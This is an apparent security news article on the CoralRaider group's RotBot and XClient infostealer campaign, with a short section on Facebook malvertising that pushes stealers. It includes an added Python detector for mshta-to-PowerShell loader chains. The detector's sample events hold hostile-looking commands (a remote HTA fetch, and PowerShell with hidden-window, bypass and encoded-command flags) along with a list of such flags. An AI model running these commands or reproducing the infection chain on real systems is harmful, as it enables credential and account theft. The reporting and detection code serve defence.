
RotBot Malware

A group believed to operate from Vietnam, tracked by security researchers as CoralRaider, has been targeting individuals across various Asian and Southeast Asian nations with information-stealing malware since at least May 2023. The operation is assessed to be financially motivated. Its focal points include India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.

This cybercriminal group specializes in stealing credentials, financial records, and social media profiles, covering both personal and business accounts. Its arsenal for this particular campaign includes RotBot, a customized version of Quasar RAT, and the XClient stealer. Additionally, the group deploys a range of off-the-shelf malware, such as AsyncRAT, NetSupport RAT, and Rhadamanthys, to gain remote access to compromised systems and siphon information from them.

Cybercriminals Aim to Compromise Sensitive Information from Selected Targets

Attackers operating from Vietnam have placed significant emphasis on compromising business and advertising accounts, employing a variety of stealer malware families such as Ducktail, NodeStealer, and VietCredCare to seize control of these accounts for subsequent monetization.

Their modus operandi involves using Telegram to exfiltrate the stolen information from victims' machines; the data is then traded in clandestine markets to generate unlawful profits.

Evidence suggests that the operators of CoralRaider are located in Vietnam, as indicated by the messages from the actors in their Telegram Command and Control (C2) bot channels, as well as their preference for the Vietnamese language in naming their bots, PDB strings, and other Vietnamese terms hardcoded within their payload binaries.

A Multi-stage Infection Chain Delivers the RotBot Malware Threat

The attack sequence initiates with a Windows shortcut file (LNK), although the method of distribution to targets remains unclear. Upon opening the LNK file, an HTML application (HTA) file is downloaded and executed from a server controlled by the attacker, subsequently running an embedded Visual Basic script.

This script, in turn, decrypts and sequentially executes three additional PowerShell scripts that perform anti-VM and anti-analysis checks, bypass Windows User Account Control (UAC), disable Windows and application notifications, and download and execute RotBot.
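As an added example (not from the original page or the underlying research), the following Python snippet flags process-creation events that match the chain described above: PowerShell launched beneath mshta.exe, plus mshta.exe invocations that fetch an HTA from a remote URL. The event records, field names, process IDs and the URL are constructed for illustration.

```python
"""Detect LNK -> HTA -> embedded script -> PowerShell launch chains in process events."""
import re
from typing import Dict, List

# Constructed sample events in a Sysmon Event ID 1 style (pid, ppid, image, cmdline).
# Not taken from any real incident; the hostname is a reserved, non-resolvable name.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": "mshta.exe",      "cmdline": "mshta.exe http://example.invalid/a.hta"},
    {"pid": 320, "ppid": 210, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -ep bypass -enc AAAA"},
    {"pid": 330, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe -c Get-Process"},
    {"pid": 400, "ppid": 100, "image": "notepad.exe",    "cmdline": "notepad.exe"},
]

REMOTE_HTA = re.compile(r"mshta\.exe\s+https?://", re.IGNORECASE)
# Flags commonly seen when a loader hides the console or passes an encoded script.
HIDDEN_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc")


def ancestry(event: Dict, by_pid: Dict[int, Dict]) -> List[str]:
    """Return image names from the event up through its parents (child first)."""
    chain = [event["image"]]
    seen = set()
    ppid = event["ppid"]
    while ppid in by_pid and ppid not in seen:  # 'seen' guards against pid-reuse loops
        seen.add(ppid)
        parent = by_pid[ppid]
        chain.append(parent["image"])
        ppid = parent["ppid"]
    return chain


def find_suspicious_chains(events: List[Dict]) -> List[Dict]:
    """PowerShell processes with mshta.exe anywhere in their ancestry."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        chain = ancestry(e, by_pid)
        if "mshta.exe" not in (p.lower() for p in chain[1:]):
            continue
        cmd = e["cmdline"].lower()
        hits.append({"pid": e["pid"], "chain": " <- ".join(chain),
                     "hidden_or_encoded": any(f in cmd for f in HIDDEN_FLAGS)})
    return hits


def remote_hta_launches(events: List[Dict]) -> List[int]:
    """PIDs of mshta.exe processes given a remote URL, as in the HTA download stage."""
    return [e["pid"] for e in events if REMOTE_HTA.search(e["cmdline"])]
```

Both checks are cheap enough to run over a full day of endpoint process telemetry; the ancestry walk is what distinguishes the loader chain from the benign interactive PowerShell in the sample data.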

RotBot is configured to communicate with a Telegram bot, from which it retrieves the XClient stealer and executes it in memory. XClient steals cookies, credentials, and financial information from Web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, as well as Discord and Telegram data, and captures screenshots.

Furthermore, XClient is designed to extract data from victims' Facebook, Instagram, TikTok, and YouTube accounts, obtaining information about payment methods and permissions associated with their Facebook business and advertisement accounts.

RotBot, a customized variant of the Quasar RAT client, has been tailored and compiled specifically for this campaign by the threat actor. XClient, for its part, has extensive information-stealing capabilities through its plugin module, along with various functions for executing remote administrative tasks.

Infostealers Remain a Considerable Threat Targeting Numerous Sectors

A malvertising campaign on Facebook is exploiting the hype surrounding generative AI tools to promote various information stealers like Rilide, Vidar, IceRAT and a newly emerged threat called Nova Stealer.

The attack begins with the threat actor seizing control of an existing Facebook account and altering its appearance to resemble popular AI tools from Google, OpenAI and Midjourney. They extend their influence by running sponsored advertisements on the platform.

For instance, a counterfeit page posing as Midjourney amassed 1.2 million followers before it was shut down on March 8, 2023. The individuals behind these pages were primarily located in Vietnam, the U.S., Indonesia, the U.K., and Australia, among other countries.

These malvertising campaigns leverage Meta's sponsored ad system to achieve extensive outreach, actively targeting European users in countries such as Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden and beyond.
